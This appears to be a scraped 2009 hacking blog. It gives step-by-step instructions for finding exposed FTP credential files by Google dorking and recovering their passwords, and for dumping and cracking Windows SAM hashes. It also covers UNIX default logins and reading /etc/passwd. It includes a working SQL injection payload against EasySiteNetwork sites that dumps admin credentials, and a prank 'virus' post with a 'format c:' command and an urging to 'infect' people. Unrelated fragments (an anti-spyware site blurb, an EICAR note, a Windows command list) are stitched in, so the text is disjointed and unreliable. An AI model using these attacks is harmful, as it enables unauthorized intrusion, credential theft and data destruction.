Menu

Monday, 28 December 2009

Today we will see what is different ways to hack ftp sites we will not cover advance scripting to hack ftp coz that we will do in other post in this part we will only discuss the simple ways that can you use to hack ftp sites. the famous tricks that may you already know or now you will know it.So lets Start hacking.

What is FTP ?

FTP is file transfer protocol that use transfer file from one host to other.

Ftp is work on default port no: "21". when we scan any server or pc & if we get result "21 port open" that how we will know that the ftp services is running on particular server or pc.

on your default browser you can surf that ftp site by simplify typing "ftp://ipaddress" or "ftp://domain"Eg.(ftp://192.168.0.1 or ftp://this.com)

Hacking FTP

some time when you use ftp sites you get access but most of times when you open ftp server or when you open it from command line it will ask you user name and password.

Common way to get access.

The simple way to get access ftp server by using anonymous ftp user name & password.

For that access in user name you need to type "anonymous" and for password "IE@user" (some type of email id not necessary that email id is yours or should be valid email address) you will get access.

Ftp servers on internet.

Yes there was simple way to get user names and password of most used server on internet.

For following trick you need a tool called "Total-Commander-Password-Recovery" you can download from following site: www.reactive-software.com

you need full version to perform password hacking trick.

and second tool is google.com.

Now fun begin.

you need go to google.com from your browser .

in search field type following code "intitle:index.of wcx_ftp.ini" click on search .

Select that website where you see "wcx_ftp.ini" in text.

Now in that directory just save wcx_ftp.ini file in your computer.

now open total commander click on from file option.

Select wcx_ftp.ini .

Then click on Recover password .

That's it look how many ftp servers password you got in one ftp.ini file.

Monday, 26 October 2009

Now first thing we want to know that in BT out HDD will appear as "hda" or "sda" device so we check with following command "dmesg | grep hda" this command will show which devices are mount as hda my HDD is also mount in hda1.

We need to mount this HDD using following command but first need to start modprobe so type following command "modprobe fuse"

For mounting hda1 use following command "ntfsmount /dev/hda1 /mnt/hda1 -o force" we use force option because some times HDD will have dirty sector so we not able mount with out that "-o force" command.

Then need to type "mount" so we will see our hda1 is mounted as "/mnt/hda1" and haves writable permission.

Now we need to use bkhive with following command "bkhive /mnt/hda1/WINDOWS/system32/config/system anishsys.txt" (NOTE: Linux is case sensitive so "WINDOWS" word should be in Caps.)

We use samdump for get hash of sam file with following command "samdump2 /mnt/hda1/WINDOWS/system32/config/SAM anishsys.txt > pass.txt"(NOTE : "WINDOWS" & "SAM" in caps.)

So we have Hash in pass.txt we can crack this hash file using "john ripper"

First we need to copy pass.txt file in john directory so use following command "cp pass.txt /pentest/passwords/jtr"

And use command for cracking hash "./john pass.txt"

That how we can crack windows hash is just five minute. but if there password is in complex policy so it will may be hard to crack with john so we can use rainbow tables for crack password up to 14 characters.

Sunday, 25 October 2009

Back Track is best Linux OS thats Available for Ethical hacking & penetrations use because its have most popular software in that so we can use for Hacking.

So for that reason Backtrack is become popular for all those who want to learn or do hacking stuff.

backtrack 4 is pre launch that have really good programs in build but for customization we need to install backtrack in our hard disk so in this tutorial i will show you how to install backtrack 4 in HDD.

We use virtual machine for installing like VMWARE because Linux base OS have some hardware compatibility issue in vmware we don't need additional driver package for installation.

Start this tutorial.

After booting for BT4 live DVD you need to go GUI version of backtrack so need to type command "startx"

When GUI has started open terminal page & type command "ubiquity" installer will start.

In installer first page will ask you "Location" so select your region like mine India so i need to select the city kolkota then click on "forward".

Second page of installer will ask about "keyboard layout" by-default it will highlight on USA but you can change it of your suitable layout. then click on "forward".

Third page is prepare disk space chose "Guided -use all disk" size of 8 GB as i want to say that this BT 4 need 4 GB default installation size so use 8GB virtual HDD because if in farther we need to do some kind of modification so we need some empty disk space.

Step five "Who are you?" its a login information so file that but remember that login name is in small linux doesn't support Caps. latter's & need to enter password just use a single word like min i use Log in name= indian & password= 1. look on that last line "What is the name of this computer?" its really important cause is will reflect after you log in so i use "IndianBox" then click on "forward".

Step seven "Ready to Install" it will give you brif details where you you see Language, name, login name & location see if that information is according right for you if you need to do some changes click on back button or click install for start Installation.

Installing system will start it will automatically creates Ext3 partition for boot root & all.

Installation complete click on "Restart now"

when restarting it will ask you "remove disk then press ENTER:" just press enter key remember when system will restart go to boot menu select boor from HDD to bring BT4 start from hard disk.

At start it will ask you Login: enter user name & password like mine

Code: ( inred thats screen will shows and Blue i enter command)

IndianBox login: indianPassword : 1 (you will not see any password you type just type correct password and press enter key)Install complete

you will get following command

Code: ( inred thats screen will shows and Blue i enter command)

indian@IndianIndianBOX:-$

But there was some problem i don't have full root access so some of my program will ask me authentication for root password and about me i don't like any restriction so i always want to login with root account because it will have full rights so lest remove this user for next time we directly enter root user name and password for login and gets root access that y i choose simple password for Indian user login so we can simply remove that. so we start now.

After login with indian user i will type following command.

Code: ( inred thats screen will shows and Blue i enter command)

indian@IndianIndianBOX:-$sudo su[ sudo ] password for indian:1(you will not see any password you type just type correct password and press enter key)root@IndianBOX:/home/indian# passwd(this will change root password by default root password is toor so anyone can use that so i will change is for my safety)Enter new UNIX password:(enter new password here)Retype new UNIX password: (enter new password here again)password: password update successfullyroot@IndianBOX:/home/indian# exitindian@IndianIndianBOX:-$ exit

(this is alternative for you but as i says i don't need any restrictions so i need to remove use indian from my BT4 so here is the command.)Code: ( inred thats screen will shows and Blue i enter command)

root@IndianBOX:~#userdel indianroot@IndianBOX:~# rm -rf /home/indian/(done i remove indian user from BT4 now we will start GUI White root)root@IndianBOX:~# startx

Original post my Anish M (please give me credit if you use this post in other site)

Monday, 19 October 2009

I always listen that the people says that Linux is very hard OS (operating system) to work on it. But the truth is that Linux is as simple as if u know the command line of Linux Linux is a UNIX based OS here i show you some simple basic commands of UNIX with hacking way & hop that will clear some of basic Hacking UNIX OS.

1.HOW TO TELL IF/IF NOT YOU ARE ON A UNIX SYSTEM: UNIX SYSTEMS ARE QUITE COMMON SYSTEMS ACROSS THE COUNTRY.
THEIR SECURITY APPEARS AS SUCH:

LOGIN; (OR LOGIN;) PASSWORD:

NOTE: WHEN HACKING ON A UNIX SYSTEM IT IS BEST TO USE LOWERCASE BECAUSE THE UNIX SYSTEM COMMANDS ARE ALL DONE IN LOWER- CASE.

2. LOGIN; IS A 1-8 CHARACTER FIELD. IT IS USUALLY THE NAME (I.E. ANISH OR INDIA) OF THE USER, OR INITIALS (I.E. M.ANISH OR L.INDIA). HINTS FOR LOGIN NAMES CAN BE FOUND TRASHING THE LOCATION OF THE DIAL-UP (USE YOUR CN/A TO FIND WHERE THE COMPUTER IS).
PASSWORD: IS A 1-8 CHARACTER PASSWORD ASSIGNED BY THE SYSOP OR CHOSEN BY THE USER.

COMMON DEFAULT LOGINS -------------------------- LOGIN; PASSWORD: ROOT ROOT,SYSTEM,ETC.. SYS SYS,SYSTEM TEST TEST UNIX UNIX BIN BIN
IF YOU GUESS A LOGIN NAME AND YOU ARE NOT ASKED FOR A PASSWORD, AND HAVE ACCESSED TO THE SYSTEM, THEN YOU HAVE WHAT IS KNOWN AS A NON-GIFTED ACCOUNT. IF YOU GUESS A CORRECT LOGIN AND PASS- WORD, THEN YOU HAVE A USER ACCOUNT. AND, IF YOU GUESS THE ROOT PASSWORD, THEN YOU HAVE A "SUPER-USER" ACCOUNT.

3. ALL UNIX SYSTEMS HAVE THE FOLLOWING INSTALLED TO THEIR SYSTEM:
ROOT, SYS, BIN, DAEMON, UUCP, ADM
ONCE YOU ARE IN THE SYSTEM, YOU WILL
GET A PROMPT. COMMON PROMPTS ARE:$ % #

BUT CAN BE JUST ABOUT ANYTHING THE SYSOP OR USER WANTS IT TO BE.

4. THINGS TO DO WHEN YOU ARE IN: SOME OF THE COMMANDS THAT YOU MAY WANT TO TRY FOLLOW BELOW:

who is on (SHOWS WHO IS CURRENTLY LOGGED ON THE SYSTEM.) ls -a (LIST ALL FILES IN CURRENT DIRECTORY.) du -a (CHECKS AMOUNT OF MEMORY YOUR FILES USE;DISK USAGE)cd\name (NAME IS THE NAME OF THE SUB-DIRECTORY YOU CHOOSE)cd\ (BRINGS YOUR HOME DIRECTORY TO CURRENT USE) cat name (NAME IS A FILENAME EITHER A PROGRAM OR DOCUMENTATION YOUR USERNAME HAS WRITTEN)

5. MOST UNIX PROGRAMS ARE WRITTEN IN THE C LANGUAGE OR PASCAL SINCE UNIX IS A PROGRAMMERS' ENVIRONMENT. ONE OF THE FIRST THINGS DONE ON THE SYSTEM IS PRINT UP OR CAPTURE (IN A BUFFER) THE FILE CONTAINING ALL USER NAMES AND ACCOUNTS. THIS CAN BE DONE BY DOING THE FOLLOWING COMMAND: CAT /ETC/PASSWD IF YOU ARE SUCCESSFUL YOU WILL A LIST OF ALL ACCOUNTS ON THE SYSTEM.IT SHOULD LOOK LIKE THIS: ROOT:HVNSDCF:0:0:ROOT DIR:/: ANISH:MAJDNFD:1:1:ANISH COOL:/BIN:/BIN/ANISH INDIA::1:2:INDIA SMITH:/BIN:/BIN/INDIA THE "ROOT" LINE TELLS THE FOLLOWING INFO :

LOGIN NAME =ROOT HVNSDCF = ENCRYPTED PASSWORD 0 = USER GROUP NUMBER 0 = USER NUMBER ROOT DIR = NAME OF USER / = ROOT DIRECTORY IN THE ANISH LOGIN, THE LAST PART "/BIN/ANISH " TELLS US WHICH DIRECTORY IS HIS HOME DIRECTORY (ANISH) IS.

IN THE "INDIA" EXAMPLE THE LOGIN NAME IS FOLLOWED BY 2 COLONS, THAT MEANS THAT THERE IS NO PASSWORD NEEDED TO GET IN USING HIS NAME.

Sunday, 4 October 2009

Some time you want to change the administrator password of a pc in your network you know the current password and want to renew that password with out going to that pc or which out taking net meeting the following batch file will help you for same. just copy below code & paste in notepadcode:@echo offtitle password chengerCOLOR 07echo network administrator password renewer.echo creator Anish Mecho http://www.webmasti.co.nrecho hrrp://www.indianehacker.blogspot.comset /p ip=ENTER IP ADDRESS :CLSset /p user=ENTER USER NAME :CLSset /p pass=ENTER CURRENT PASSWORD :CLSECHO PROVIDE NEW PASSWORD DETAILSset /p pwd=ENTER NEW PASSWORD:CLSECHO YOUR NEW PASSWORD FOR %IP% COMPUTER %user% IS %PWD%COLOR 04ECHO NOTE :PASSWORD WILL CHANGE FOR THE IP ADDRESS YOU PROVIDED.ECHO ARE YOU WANT TO PROSEEDSET /P Y= TYPE Y or N:CLSCOLOR 07GOTO %Y%

but this only works if the original motherboard and harddrive still work.

so put it back together.for newbies =>

1> go to control panel,2> double-click the system icon,3> go to hardware tab,4> click device manager button.5> find the IDE ATA/ATAPI CONTROLLERS and expand the tab.6> not the primary or secondary controller,7> but right-click the first controller.8> choose update driver.9> choose the option to install from a list or specific location.a> click next. now choose the (don't search. I will choose the driver to install) option.b> click next. now highlight the Standard Dual Channel Pci Ide Controller.c> click next. the Standard controller will install.7> now reboot. log in.: The standard controller is completely installed.you can now shutdown the computer, remove your harddrive, and it will boot with the new motherboard.no dump error work fine with new motherboard.

This definitely doesn't work on every single website, so please please please dont complain. This took a really long time to make so please be happy Starting (Must use Firefox)1. Open Google2. type in Code: "Powered by EasySiteNetwork /category.php " When choosing a site to hack, make sure you dont choose one talking about the sql injection.. that wont get you anywhere .I Found the site im going to use in this tutorial, on page 8 of my google searchExploit1. Take a look at the url box, make sure it says category.php somewhere in the link otherwise this wont workThis is the exploit Code: /category.php?catid=1+union+select+111,222,concat_ws(char(58),login,password,email),444+from+users/* Starting from category.php highlight the rest of the url and replace it with the exploit code .Ok now click Enter and notice the changes to the page .The user information is set up like this : Username: Password: EmailNOTE: if there is more then one username and password, then its most likely that the 2nd one is the Admin Account, but if there is only one username, then it of course is the only one displayedSo in this situation the Admin username is :1stAngel and the password is: akhualNow in order to login to the admin control panel, we most add this extension to the original url : /siteadmin/index.phpNOTE: Sometimes there is a popup to login to the admin panel, thats okay to, but if it doesnt work, then just login like any other user would on the home pageCongrats you are now logged into the admin control panel, do as you please, also if you find out the hosting the website is using, by typing in a false path, you can login to there FTPNote : This information is for education purpose only

Do not try it on ur PC. dont mess around this is for educational purpose only

Step 1.

Copy The Following In Notepad Exactly as it says

01001011000111110010010101010101010000011111100000

Step 2.

Save As An EXE Any Name Will Do

Step 3.

Send the EXE to People And Infect

OR

IF u think u cannot format c driver when windows is running try Laughing and u will get it Razz .. any way some more so u can test on other drives this is simple binary codeformat c:\ /Q/X -- this will format your drive c:\

Corrupt AntiSpyware category contains the list of corrupt, rogue, fake, illegal, even harmful anti-spyware tools that cannot correctly detect and remove spyware or other parasites and therefore are totally ineffective and should NOT be purchased and used. Listed programs have been carefully tested by the 2-spyware.com research center and did not pass most of our tests. These so-called spyware removers are driven by SPAM or deceptive advertising, are illegitimate clones of each other, use incorrect pest detection techniques, produce false positives finding malicious programs even in completely clean systems or do not work properly at all. Neither of corrupt anti-spyware tools can effectively fight against parasites, as most of them are made only to trick users in order to make money from them.

Each spyware remover in the category comes with a review describing its negative sides and the reason why it was added to the corrupt anti-spyware list. Published reviews also include program screenshots, highlighting its questionable behavior, produced false positives, made detection and removal mistakes, etc. We rate tested programs by giving them marks from 1 to 100. The lower mark a spyware remover gets the less effective it is. Please carefully read each review, pay attention to the rating mark a program got and read comments published by other visitors. This will help you to make a wise choice and learn more about your currently used anti-spyware program.

In the list of questionable tools we add potentially corrupt anti-spyware programs that were not tested by the 2-spyware.com research center due several reasons. Most of listed products are discontinued, others do not have any free, demonstration or trial versions. Nevertheless, all the entries definitely are rogue, ineffective and even harmful. Reviews are based on information provided by reliable sources such as SpywareWarrior, Sunbelt Software, Eric L. Howes, Patrick M. Kolla and others.

If you need a legitimate and effective spyware remover, please visit the anti-spyware category, which contains the list of all known legitimate anti-spyware programs able to effectively detect and remove spyware or other parasites. Drop us a note if you have found the program which deserves to be listed in the list of corrupt anti-spyware tools.

After some seconds saving this file your antivirus should come with the message that this file is infected virus asking permission for its deletion/clean.This file is secure and its not gonna infect your computer in whatever way. It is a standart text developed by the European Institute for Computer Anti-virus Research (EICAR).Every antivirus is programed to load this file as a virus.

If your antivirus is not going to hack this file as a virus, in your screen will appear DOS window with this text EICAR-STANDARD-ANTIVIRUS-TEST-FILE".If this happens then you should probably find some other Antivirus up to date, meaning your PC might already being infected from viruses (<

Some times when you try to open registry you gets error message That "Administrator Disable registry" but you are the the admin of that pc it couse by some virus you can enable registry simply follow the stapes.copy & paste below code in notepad

PATH Display or set a search path for executable filesPATHPING Trace route plus network latency and packet lossPAUSE Suspend processing of a batch file and display a messagePERMS Show permissions for a userPERFMON Performance MonitorPING Test a network connectionPOPD Restore the previous value of the current directory saved by PUSHDPORTQRY Display the status of ports and servicesPRINT Print a text filePRNCNFG Display, configure or rename a printerPRNMNGR Add, delete, list printers set the default printerPROMPT Change the command promptPsExec Execute process remotelyPsFile Show files opened remotelyPsGetSid Display the SID of a computer or a userPsInfo List information about a systemPsKill Kill processes by name or process IDPsList List detailed information about processesPsLoggedOn Who's logged on (locally or via resource sharing)PsLogList Event log recordsPsPasswd Change account passwordPsService View and control servicesPsShutdown Shutdown or reboot a computerPsSuspend Suspend processesPUSHD Save and then change the current directory

QGREP Search file(s) for lines that match a given pattern.

RASDIAL Manage RAS connectionsRASPHONE Manage RAS connectionsRECOVER Recover a damaged file from a defective disk.REG Read, Set or Delete registry keys and valuesREGEDIT Import or export registry settingsREGSVR32 Register or unregister a DLLREGINI Change Registry PermissionsREM Record comments (remarks) in a batch fileREN Rename a file or files.REPLACE Replace or update one file with anotherRD Delete folder(s)RDISK Create a Recovery DiskRMTSHARE Share a folder or a printerROBOCOPY Robust File and Folder CopyROUTE Manipulate network routing tablesRUNAS Execute a program under a different user accountRUNDLL32 Run a DLL command (add/remove print connections)

SC Service ControlSCHTASKS Create or Edit Scheduled TasksSCLIST Display NT ServicesScriptIt Control GUI applicationsSET Display, set, or remove environment variablesSETLOCAL Begin localisation of environment changes in a batch fileSETX Set environment variables permanentlySHARE List or edit a file share or print shareSHIFT Shift the position of replaceable parameters in a batch fileSHORTCUT Create a windows shortcut (.LNK file)SHOWGRPS List the NT Workgroups a user has joinedSHOWMBRS List the Users who are members of a WorkgroupSHUTDOWN Shutdown the computerSLEEP Wait for x secondsSOON Schedule a command to run in the near futureSORT Sort inputSTART Start a separate window to run a specified program or commandSU Switch UserSUBINACL Edit file and folder Permissions, Ownership and DomainSUBST Associate a path with a drive letterSYSTEMINFO List system configuration

TASKLIST List running applications and servicesTIME Display or set the system timeTIMEOUT Delay processing of a batch fileTITLE Set the window title for a CMD.EXE sessionTOUCH Change file timestampsTRACERT Trace route to a remote hostTREE Graphical display of folder structureTYPE Display the contents of a text file

USRSTAT List domain usernames and last login

VER Display version informationVERIFY Verify that files have been savedVOL Display a disk label

WHERE Locate and display files in a directory treeWHOAMI Output the current UserName and domainWINDIFF Compare the contents of two files or sets of filesWINMSD Windows system diagnosticsWINMSDP Windows system diagnostics IIWMIC WMI Commands